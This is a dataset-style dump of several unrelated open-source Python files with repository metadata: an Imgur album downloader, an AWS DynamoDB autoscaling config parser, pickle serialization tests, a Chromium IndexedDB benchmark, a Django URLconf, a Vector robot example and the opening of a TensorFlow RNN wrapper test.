import sys
import re
import urllib.request, urllib.parse, urllib.error
import os
import math
help_message = """
Quickly and easily download an album from Imgur.
Format:
$ python imguralbum.py [album URL] [destination folder]
Example:
$ python imguralbum.py http://imgur.com/a/uOOju#6 /Users/alex/images
If you omit the dest folder name, the utility will create one with the same name
as the album
(for example for http://imgur.com/a/uOOju it'll create uOOju/ in the cwd)
"""
class ImgurAlbumException(Exception):
def __init__(self, msg=False):
self.msg = msg
class ImgurAlbumDownloader:
def __init__(self, album_url):
"""
Constructor. Pass in the album_url that you want to download.
"""
self.album_url = album_url
# Callback members:
self.image_callbacks = []
self.complete_callbacks = []
# Check the URL is actually imgur:
        match = re.match(r"(https?)://(www\.)?(?:m\.)?imgur\.com/(a|gallery)/([a-zA-Z0-9]+)(#[0-9]+)?", album_url)
if not match:
raise ImgurAlbumException("URL must be a valid Imgur Album")
self.protocol = match.group(1)
self.album_key = match.group(4)
# Read the no-script version of the page for all the images:
fullListURL = "http://imgur.com/a/" + self.album_key + "/layout/blog"
try:
self.response = urllib.request.urlopen(url=fullListURL)
response_code = self.response.getcode()
except Exception as e:
self.response = False
            response_code = getattr(e, 'code', -1)  # not every failure carries an HTTP code
if not self.response or self.response.getcode() != 200:
raise ImgurAlbumException("Error reading Imgur: Error Code %d" % response_code)
# Read in the images now so we can get stats and stuff:
html = self.response.read().decode('utf-8')
self.imageIDs = re.findall('<div id="([a-zA-Z0-9]+)" class="post-image-container', html)
def num_images(self):
"""
Returns the number of images that are present in this album.
"""
return len(self.imageIDs)
    def get_album_key(self):
        """
        Returns the key of this album. Helpful if you plan on generating your own
        folder names. (Named get_album_key so the album_key attribute set in the
        constructor does not shadow it.)
        """
        return self.album_key
def on_image_download(self, callback):
"""
Allows you to bind a function that will be called just before an image is
        about to be downloaded. You'll be given the 1-indexed position of the image, its URL
        and its destination file in the callback like so:
my_awesome_callback(1, "http://i.imgur.com/fGWX0.jpg", "~/Downloads/1-fGWX0.jpg")
"""
self.image_callbacks.append(callback)
def on_complete(self, callback):
"""
Allows you to bind onto the end of the process, displaying any lovely messages
to your users, or carrying on with the rest of the program. Whichever.
"""
self.complete_callbacks.append(callback)
def save_images(self, foldername=False):
"""
Saves the images from the album into a folder given by foldername.
If no foldername is given, it'll use the cwd and the album key.
And if the folder doesn't exist, it'll try and create it.
"""
# Try and create the album folder:
if foldername:
albumFolder = foldername
else:
albumFolder = self.album_key
if not os.path.exists(albumFolder):
os.makedirs(albumFolder)
# And finally loop through and save the images:
for (counter, image) in enumerate(self.imageIDs, start=1):
image_url = "http://i.imgur.com/"+image+".jpg"
prefix = "%0*d-" % (
int(math.ceil(math.log(len(self.imageIDs) + 1, 10))),
counter
)
path = os.path.join(albumFolder, prefix + image + ".jpg")
# Run the callbacks:
for fn in self.image_callbacks:
fn(counter, image_url, path)
# Actually download the thing
            if os.path.isfile(path):
                answer = input('File already exists. Download it again? (Y/N): ')
                if answer.strip().upper() == 'Y':
                    os.remove(path)
                    urllib.request.urlretrieve(image_url, path)
                else:
                    print("Skipping, already exists.")
            else:
                try:
                    urllib.request.urlretrieve(image_url, path)
                except urllib.error.URLError:
                    print("Download failed.")
# Run the complete callbacks:
for fn in self.complete_callbacks:
fn()
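# Illustrative sketch of programmatic use (kept as comments so importing this
# module stays side-effect free; the album URL and folder below are placeholders
# taken from the help text above, not values this script ships with):
#
#   downloader = ImgurAlbumDownloader("http://imgur.com/a/uOOju")
#   downloader.on_image_download(lambda i, url, dest: print(i, url, "->", dest))
#   downloader.on_complete(lambda: print("All images saved"))
#   downloader.save_images("uOOju")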
if __name__ == '__main__':
args = sys.argv
if len(args) == 1:
# Print out the help message and exit:
print (help_message)
exit()
try:
# Fire up the class:
downloader = ImgurAlbumDownloader(args[1])
print(("Found {0} images in album".format(downloader.num_images())))
# Called when an image is about to download:
def print_image_progress(index, url, dest):
print(("Downloading Image %d" % index))
print((" %s >> %s" % (url, dest)))
downloader.on_image_download(print_image_progress)
# Called when the downloads are all done.
def all_done():
print ("")
print ("Done!")
downloader.on_complete(all_done)
# Work out if we have a foldername or not:
if len(args) == 3:
albumFolder = args[2]
else:
albumFolder = False
# Enough talk, let's save!
downloader.save_images(albumFolder)
exit()
except ImgurAlbumException as e:
print(("Error: " + e.msg))
print ("")
print ("How to use")
print ("=============")
print (help_message)
exit(1)
| 30.841584
| 116
| 0.583949
|
57bc188a7b98c6aa83af0eddab173c978f650137
| 1,942
|
py
|
Python
|
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | 1
|
2018-10-13T06:32:10.000Z
|
2018-10-13T06:32:10.000Z
|
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | null | null | null |
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | 1
|
2020-06-16T15:13:06.000Z
|
2020-06-16T15:13:06.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This package provides an API for modeling ARIA's state and serializing it to storage.
"""
from collections import namedtuple
from . import (
mixins,
types,
models,
utils,
service_template as _service_template_bases,
service_instance as _service_instance_bases,
service_changes as _service_changes_bases,
service_common as _service_common_bases,
orchestration as _orchestration_bases
)
_ModelBasesCls = namedtuple('ModelBase', 'service_template,'
'service_instance,'
'service_changes,'
'service_common,'
'orchestration')
model_bases = _ModelBasesCls(service_template=_service_template_bases,
service_instance=_service_instance_bases,
service_changes=_service_changes_bases,
service_common=_service_common_bases,
orchestration=_orchestration_bases)
__all__ = (
'mixins',
'types',
'models',
'model_bases',
'utils'
)
| 35.309091
| 85
| 0.663234
|
1dea72fb259af792577109738a1dbc63324f43b3
| 13,841
|
py
|
Python
|
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
""" Command line configuration parser """
import sys
import os.path
import ConfigParser
from copy import deepcopy
TABLE_CONFIG_OPTIONS = [
{
'key': 'enable_reads_autoscaling',
'option': 'enable-reads-autoscaling',
'required': False,
'type': 'bool'
},
{
'key': 'enable_writes_autoscaling',
'option': 'enable-writes-autoscaling',
'required': False,
'type': 'bool'
},
{
'key': 'disable_reads_up_scaling',
'option': 'disable-reads-up-scaling',
'required': False,
'type': 'bool'
},
{
'key': 'disable_reads_down_scaling',
'option': 'disable-reads-down-scaling',
'required': False,
'type': 'bool'
},
{
'key': 'reads_lower_threshold',
'option': 'reads-lower-threshold',
'required': False,
'type': 'int'
},
{
'key': 'reads_upper_threshold',
'option': 'reads-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'throttled_reads_upper_threshold',
'option': 'throttled-reads-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'increase_reads_with',
'option': 'increase-reads-with',
'required': False,
'type': 'int'
},
{
'key': 'decrease_reads_with',
'option': 'decrease-reads-with',
'required': False,
'type': 'int'
},
{
'key': 'increase_reads_unit',
'option': 'increase-reads-unit',
'required': True,
'type': 'str'
},
{
'key': 'decrease_reads_unit',
'option': 'decrease-reads-unit',
'required': True,
'type': 'str'
},
{
'key': 'writes_lower_threshold',
'option': 'writes-lower-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes_upper_threshold',
'option': 'writes-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'throttled_writes_upper_threshold',
'option': 'throttled-writes-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'increase_writes_with',
'option': 'increase-writes-with',
'required': False,
'type': 'int'
},
{
'key': 'decrease_writes_with',
'option': 'decrease-writes-with',
'required': False,
'type': 'int'
},
{
'key': 'increase_writes_unit',
'option': 'increase-writes-unit',
'required': True,
'type': 'str'
},
{
'key': 'decrease_writes_unit',
'option': 'decrease-writes-unit',
'required': True,
'type': 'str'
},
{
'key': 'min_provisioned_reads',
'option': 'min-provisioned-reads',
'required': False,
'type': 'int'
},
{
'key': 'max_provisioned_reads',
'option': 'max-provisioned-reads',
'required': False,
'type': 'int'
},
{
'key': 'min_provisioned_writes',
'option': 'min-provisioned-writes',
'required': False,
'type': 'int'
},
{
'key': 'max_provisioned_writes',
'option': 'max-provisioned-writes',
'required': False,
'type': 'int'
},
{
'key': 'maintenance_windows',
'option': 'maintenance-windows',
'required': False,
'type': 'str'
},
{
'key': 'allow_scaling_down_reads_on_0_percent',
'option': 'allow-scaling-down-reads-on-0-percent',
'required': False,
'type': 'bool'
},
{
'key': 'allow_scaling_down_writes_on_0_percent',
'option': 'allow-scaling-down-writes-on-0-percent',
'required': False,
'type': 'bool'
},
{
'key': 'always_decrease_rw_together',
'option': 'always-decrease-rw-together',
'required': False,
'type': 'bool'
},
{
'key': 'sns_topic_arn',
'option': 'sns-topic-arn',
'required': False,
'type': 'str'
},
{
'key': 'sns_message_types',
'option': 'sns-message-types',
'required': False,
'type': 'str'
},
{
'key': 'num_read_checks_before_scale_down',
'option': 'num-read-checks-before-scale-down',
'required': False,
'type': 'int'
},
{
'key': 'num_write_checks_before_scale_down',
'option': 'num-write-checks-before-scale-down',
'required': False,
'type': 'int'
},
{
'key': 'num_write_checks_reset_percent',
'option': 'num-write-checks-reset-percent',
'required': False,
'type': 'int'
},
{
'key': 'num_read_checks_reset_percent',
'option': 'num-read-checks-reset-percent',
'required': False,
'type': 'int'
},
{
'key': 'reads-upper-alarm-threshold',
'option': 'reads-upper-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'reads-lower-alarm-threshold',
'option': 'reads-lower-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes-upper-alarm-threshold',
'option': 'writes-upper-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes-lower-alarm-threshold',
'option': 'writes-lower-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'lookback_window_start',
'option': 'lookback-window-start',
'required': False,
'type': 'int'
}
]
def __parse_options(config_file, section, options):
""" Parse the section options
:type config_file: ConfigParser object
:param config_file: The config file object to use
:type section: str
:param section: Which section to read in the configuration file
:type options: list of dicts
:param options:
A list of options to parse. Example list::
[{
'key': 'aws_access_key_id',
'option': 'aws-access-key-id',
'required': False,
'type': str
}]
:returns: dict
"""
configuration = {}
for option in options:
try:
if option.get('type') == 'str':
configuration[option.get('key')] = \
config_file.get(section, option.get('option'))
elif option.get('type') == 'int':
try:
configuration[option.get('key')] = \
config_file.getint(section, option.get('option'))
except ValueError:
print('Error: Expected an integer value for {0}'.format(
option.get('option')))
sys.exit(1)
elif option.get('type') == 'float':
try:
configuration[option.get('key')] = \
config_file.getfloat(section, option.get('option'))
except ValueError:
                    print('Error: Expected a float value for {0}'.format(
option.get('option')))
sys.exit(1)
elif option.get('type') == 'bool':
try:
configuration[option.get('key')] = \
config_file.getboolean(section, option.get('option'))
except ValueError:
                    print('Error: Expected a boolean value for {0}'.format(
option.get('option')))
sys.exit(1)
else:
configuration[option.get('key')] = \
config_file.get(section, option.get('option'))
except ConfigParser.NoOptionError:
if option.get('required'):
                print('Missing [{0}] option "{1}" in configuration'.format(
                    section, option.get('option')))
sys.exit(1)
return configuration
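# Illustrative call sketch following the docstring example above (the section
# and option names are placeholders for this sketch, mirroring what parse()
# does below):
#
#   global_opts = __parse_options(
#       config_file,
#       'global',
#       [{'key': 'region', 'option': 'region', 'required': False, 'type': 'str'}])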
def parse(config_path):
""" Parse the configuration file
:type config_path: str
:param config_path: Path to the configuration file
"""
config_path = os.path.expanduser(config_path)
# Read the configuration file
config_file = ConfigParser.RawConfigParser()
config_file.optionxform = lambda option: option
config_file.read(config_path)
#
# Handle [global]
#
global_config = {}
if 'global' in config_file.sections():
global_config = __parse_options(
config_file,
'global',
[
{
'key': 'aws_access_key_id',
'option': 'aws-access-key-id',
'required': False,
'type': 'str'
},
{
'key': 'aws_secret_access_key',
'option': 'aws-secret-access-key-id',
'required': False,
'type': 'str'
},
{
'key': 'region',
'option': 'region',
'required': False,
'type': 'str'
},
{
'key': 'check_interval',
'option': 'check-interval',
'required': False,
'type': 'int'
},
{
'key': 'circuit_breaker_url',
'option': 'circuit-breaker-url',
'required': False,
'type': 'str'
},
{
'key': 'circuit_breaker_timeout',
'option': 'circuit-breaker-timeout',
'required': False,
'type': 'float'
},
])
#
# Handle [logging]
#
logging_config = {}
if 'logging' in config_file.sections():
logging_config = __parse_options(
config_file,
'logging',
[
{
'key': 'log_level',
'option': 'log-level',
'required': False,
'type': 'str'
},
{
'key': 'log_file',
'option': 'log-file',
'required': False,
'type': 'str'
},
{
'key': 'log_config_file',
'option': 'log-config-file',
'required': False,
'type': 'str'
}
])
#
# Handle monitoring
#
monitoring_config = {}
if 'monitoring' in config_file.sections():
monitoring_config = __parse_options(
config_file,
'monitoring',
[
{
'key': 'datadog_api_key',
'option': 'datadog-api-key',
'required': False,
'type': 'str'
},
{
'key': 'datadog_application_key',
'option': 'datadog-application-key',
'required': False,
'type': 'str'
}
]
)
if 'default_options' in config_file.sections():
# nothing is required in defaults, so we set required to False
default_config_options = deepcopy(TABLE_CONFIG_OPTIONS)
for item in default_config_options:
item['required'] = False
default_options = __parse_options(
config_file, 'default_options', default_config_options)
# if we've got a default set required to be false for table parsing
for item in TABLE_CONFIG_OPTIONS:
if item['key'] in default_options:
item['required'] = False
else:
default_options = {}
#
# Handle [table: ]
#
table_config = {'tables': {}}
# Find the first table definition
found_table = False
for current_section in config_file.sections():
if current_section.rsplit(':', 1)[0] != 'table':
continue
found_table = True
current_table_name = current_section.rsplit(':', 1)[1].strip()
table_config['tables'][current_table_name] = \
dict(default_options.items() + __parse_options(
config_file, current_section, TABLE_CONFIG_OPTIONS).items())
if not found_table:
print('Could not find a [table: <table_name>] section in {0}'.format(
config_path))
sys.exit(1)
# Find gsi definitions - this allows gsi's to be defined before the table
# definitions we don't worry about parsing everything twice here
for current_section in config_file.sections():
try:
header1, gsi_key, header2, table_key = current_section.split(' ')
except ValueError:
continue
if header1 != 'gsi:':
continue
if table_key not in table_config['tables']:
print('No table configuration matching {0} found.'.format(
table_key))
sys.exit(1)
if 'gsis' not in table_config['tables'][table_key]:
table_config['tables'][table_key]['gsis'] = {}
table_config['tables'][table_key]['gsis'][gsi_key] = \
dict(default_options.items() + __parse_options(
config_file, current_section, TABLE_CONFIG_OPTIONS).items())
return dict(
global_config.items() +
logging_config.items() +
table_config.items() +
monitoring_config.items()
)
| 29.324153
| 77
| 0.486815
|
4d7d079e59959726ad2bb66d3a46b418c7d68bd3
| 3,220
|
py
|
Python
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 13
|
2016-03-30T10:45:10.000Z
|
2020-12-29T14:15:50.000Z
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 5
|
2017-04-05T14:56:32.000Z
|
2020-03-28T20:34:09.000Z
|
testing/tests/b64pickle_test.py
|
alexey74/django-concurrent-test-helper
|
1202915049a498d8fc31a75d83b459854f76750b
|
[
"Apache-2.0"
] | 1
|
2021-01-12T16:38:49.000Z
|
2021-01-12T16:38:49.000Z
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function
from base64 import b64encode
from datetime import date, datetime
from decimal import Decimal
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import mock
import pytest
import pytz
from django_concurrent_tests import b64pickle
from django_concurrent_tests.utils import redirect_stdout
from testapp.models import Semaphore
def test_string():
obj = 'whatever 🚀'
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_dict():
obj = {'val': 'whatever 🚀'}
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_list():
obj = ['whatever 🚀']
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_decimal():
obj = Decimal('3.25')
encoded = b64pickle.dumps(obj)
    # unlike JSON, pickle preserves the Decimal type exactly
assert b64pickle.loads(encoded) == obj
def test_datetime():
obj = datetime.now()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_datetime_timezone():
obj = datetime.now().replace(tzinfo=pytz.timezone('US/Pacific'))
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_datetime_timezone_utc():
obj = datetime.now().replace(tzinfo=pytz.UTC)
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_date():
obj = date.today()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_time():
obj = datetime.now().time()
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
@pytest.mark.django_db
def test_model_queryset():
Semaphore.objects.create()
obj = list(Semaphore.objects.all())
encoded = b64pickle.dumps(obj)
assert b64pickle.loads(encoded) == obj
def test_string_stdout_roundtrip():
obj = 'whatever 🚀'
output = StringIO()
with redirect_stdout(output):
print('--kwargs=%s' % b64pickle.dumps(obj))
option = output.getvalue()
key, val = option.split('=', 1)
print(option)
print(val)
assert b64pickle.loads(val) == obj
def test_error_unpickling():
unpickle_error = RuntimeError("Could not unpickle")
b64pickled_value = b64encode("pickled value".encode('ascii'))
with mock.patch(
'pickle.loads',
side_effect=unpickle_error,
):
with pytest.raises(b64pickle.PickleLoadsError) as exc_info:
b64pickle.loads(b64pickled_value)
assert exc_info.value.args[0] == unpickle_error
assert exc_info.value.args[1] == "pickled value"
def test_error_unpickling_truncation():
unpickle_error = RuntimeError("Could not unpickle")
b64pickled_value = b64encode(
"pickled value,unpickle_traceback:blahblahblah".encode('ascii')
)
with mock.patch(
'pickle.loads',
side_effect=unpickle_error,
):
with pytest.raises(b64pickle.PickleLoadsError) as exc_info:
b64pickle.loads(b64pickled_value)
assert exc_info.value.args[0] == unpickle_error
assert exc_info.value.args[1] == "pickled value,unpickle_traceback..."
| 25.555556
| 74
| 0.694099
|
905ac1aeb3a2fe63b606126d66972d794eb15322
| 1,623
|
py
|
Python
|
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
geotrek/sensitivity/serializers.py
|
fossabot/Geotrek-admin
|
ea2c873511ad724c742c64d81cbf31f37dbe3093
|
[
"BSD-2-Clause"
] | null | null | null |
from django.core.urlresolvers import reverse
from django.utils.translation import get_language
from rest_framework import serializers as rest_serializers
from rest_framework_gis import serializers as geo_serializers
from geotrek.common.serializers import PictogramSerializerMixin, TranslatedModelSerializer
from geotrek.sensitivity import models as sensitivity_models
class SportPracticeSerializer(TranslatedModelSerializer):
class Meta:
model = sensitivity_models.SportPractice
fields = ('id', 'name')
class SpeciesSerializer(TranslatedModelSerializer, PictogramSerializerMixin):
practices = SportPracticeSerializer(many=True)
period = rest_serializers.SerializerMethodField()
def get_period(self, obj):
return [getattr(obj, 'period{:02}'.format(p)) for p in range(1, 13)]
class Meta:
model = sensitivity_models.Species
fields = ['id', 'name', 'practices', 'url', 'pictogram', 'period']
class SensitiveAreaSerializer(TranslatedModelSerializer):
species = SpeciesSerializer()
geometry = geo_serializers.GeometrySerializerMethodField(read_only=True)
kml_url = rest_serializers.SerializerMethodField(read_only=True)
def get_geometry(self, obj):
return obj.geom2d_transformed
def get_kml_url(self, obj):
return reverse('sensitivity:sensitivearea_kml_detail', kwargs={'lang': get_language(), 'pk': obj.pk})
class Meta:
model = sensitivity_models.SensitiveArea
geo_field = 'geometry'
fields = ('id', 'species', 'description', 'contact', 'published', 'publication_date', 'kml_url', 'geometry')
| 38.642857
| 116
| 0.749846
|
8cf33e5d398b6b9cb40dc27f9ddab1dcd73e7680
| 1,654
|
py
|
Python
|
tools/perf/benchmarks/indexeddb_perf.py
|
SlimKatLegacy/android_external_chromium_org
|
ee480ef5039d7c561fc66ccf52169ead186f1bea
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2015-03-04T02:36:53.000Z
|
2016-06-25T11:22:17.000Z
|
tools/perf/benchmarks/indexeddb_perf.py
|
j4ckfrost/android_external_chromium_org
|
a1a3dad8b08d1fcf6b6b36c267158ed63217c780
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/perf/benchmarks/indexeddb_perf.py
|
j4ckfrost/android_external_chromium_org
|
a1a3dad8b08d1fcf6b6b36c267158ed63217c780
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4
|
2015-02-09T08:49:30.000Z
|
2017-08-26T02:03:34.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Chromium's IndexedDB performance test. These test:
Databases:
create/delete
Keys:
create/delete
Indexes:
create/delete
Data access:
Random read/write
Sporadic writes
Read cache
Cursors:
Read & random writes
Walking multiple
Seeking.
"""
import json
import os
from telemetry import test
from telemetry.core import util
from telemetry.page import page_measurement
from telemetry.page import page_set
class _IndexedDbMeasurement(page_measurement.PageMeasurement):
def MeasurePage(self, _, tab, results):
tab.WaitForDocumentReadyStateToBeComplete()
tab.WaitForJavaScriptExpression(
'window.document.cookie.indexOf("__done=1") >= 0', 600)
js_get_results = "JSON.stringify(automation.getResults());"
result_dict = json.loads(tab.EvaluateJavaScript(js_get_results))
total = 0.0
for key in result_dict:
if key == 'OverallTestDuration':
continue
msec = float(result_dict[key])
results.Add(key, 'ms', msec, data_type='unimportant')
total += msec
results.Add('Total', 'ms', total)
class IndexedDb(test.Test):
"""Chromium's IndexedDB Performance tests."""
test = _IndexedDbMeasurement
def CreatePageSet(self, options):
indexeddb_dir = os.path.join(util.GetChromiumSrcDir(), 'chrome', 'test',
'data', 'indexeddb')
return page_set.PageSet.FromDict({
'pages': [
{ 'url': 'file://perf_test.html' }
]
}, indexeddb_dir)
| 27.114754
| 76
| 0.69347
|
f96559c501ae5491a68e7d46164eb07f5e1d74b4
| 989
|
py
|
Python
|
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | 2
|
2021-05-12T13:38:30.000Z
|
2022-02-26T13:45:54.000Z
|
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | null | null | null |
django_server/api/urls.py
|
DigitalHealthIntegration/rdt-reader
|
242a4d813a6b58b3668f4d4ce35cea8f55bd651f
|
[
"MIT"
] | null | null | null |
"""api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rdtServer.views import ViewRdt
from rdtServer.views import DoHealthCheck
urlpatterns = [
path('admin/', admin.site.urls),
    path('Quidel/QuickVue', ViewRdt),
    path('Quidel/QuickVue/', ViewRdt),
    path('health-check', DoHealthCheck),
    path('health-check/', DoHealthCheck)
]
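# Illustrative sketch, as described in the URLconf docstring above: pulling in
# another app's URLconf with include(). The 'rdtServer.urls' module name is an
# assumption for illustration, not a module known to exist in this project.
#
#   urlpatterns += [path('api/', include('rdtServer.urls'))]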
| 32.966667
| 77
| 0.715875
|
4502900de3229e5536af93887dcb375c2b370d99
| 1,793
|
py
|
Python
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 516
|
2018-12-12T06:05:03.000Z
|
2022-03-30T10:00:20.000Z
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 37
|
2018-12-12T09:41:46.000Z
|
2022-03-06T13:42:24.000Z
|
examples/tutorials/06_face_image.py
|
rmcolbert/vector-python-sdk
|
7e29e81578bd862b6462d7f7502c4aa67de29fb5
|
[
"Apache-2.0"
] | 350
|
2018-12-11T23:24:01.000Z
|
2022-03-16T12:57:33.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display an image on Vector's face
"""
import os
import sys
import time
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
import anki_vector
from anki_vector.util import degrees
def main():
args = anki_vector.util.parse_command_args()
with anki_vector.Robot(args.serial) as robot:
# If necessary, move Vector's Head and Lift to make it easy to see his face
robot.behavior.set_head_angle(degrees(45.0))
robot.behavior.set_lift_height(0.0)
current_directory = os.path.dirname(os.path.realpath(__file__))
image_path = os.path.join(current_directory, "..", "face_images", "cozmo_image.jpg")
# Load an image
image_file = Image.open(image_path)
# Convert the image to the format used by the Screen
print("Display image on Vector's face...")
screen_data = anki_vector.screen.convert_image_to_screen_data(image_file)
duration_s = 4.0
robot.screen.set_screen_with_image_data(screen_data, duration_s)
time.sleep(duration_s)
if __name__ == "__main__":
main()
| 30.913793
| 92
| 0.714445
|
8491ed0098ecfe2f7009bc35b684154223d7863b
| 9,641
|
py
|
Python
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/keras/layers/rnn_cell_wrapper_v2_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 28
|
2020-02-10T07:03:06.000Z
|
2022-01-12T11:19:20.000Z
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cell wrapper v2 implementation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.keras import combinations
from tensorflow.python.keras import layers
from tensorflow.python.keras.layers import rnn_cell_wrapper_v2
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
@combinations.generate(combinations.combine(mode=["graph", "eager"]))
class RNNCellWrapperTest(test.TestCase, parameterized.TestCase):
def testResidualWrapper(self):
wrapper_type = rnn_cell_wrapper_v2.ResidualWrapper
x = ops.convert_to_tensor_v2(np.array([[1., 1., 1.]]), dtype="float32")
m = ops.convert_to_tensor_v2(np.array([[0.1, 0.1, 0.1]]), dtype="float32")
base_cell = rnn_cell_impl.GRUCell(
3, kernel_initializer=init_ops.constant_initializer(0.5),
bias_initializer=init_ops.constant_initializer(0.5))
g, m_new = base_cell(x, m)
wrapper_object = wrapper_type(base_cell)
(name, dep), = wrapper_object._checkpoint_dependencies
wrapper_object.get_config() # Should not throw an error
self.assertIs(dep, base_cell)
self.assertEqual("cell", name)
g_res, m_new_res = wrapper_object(x, m)
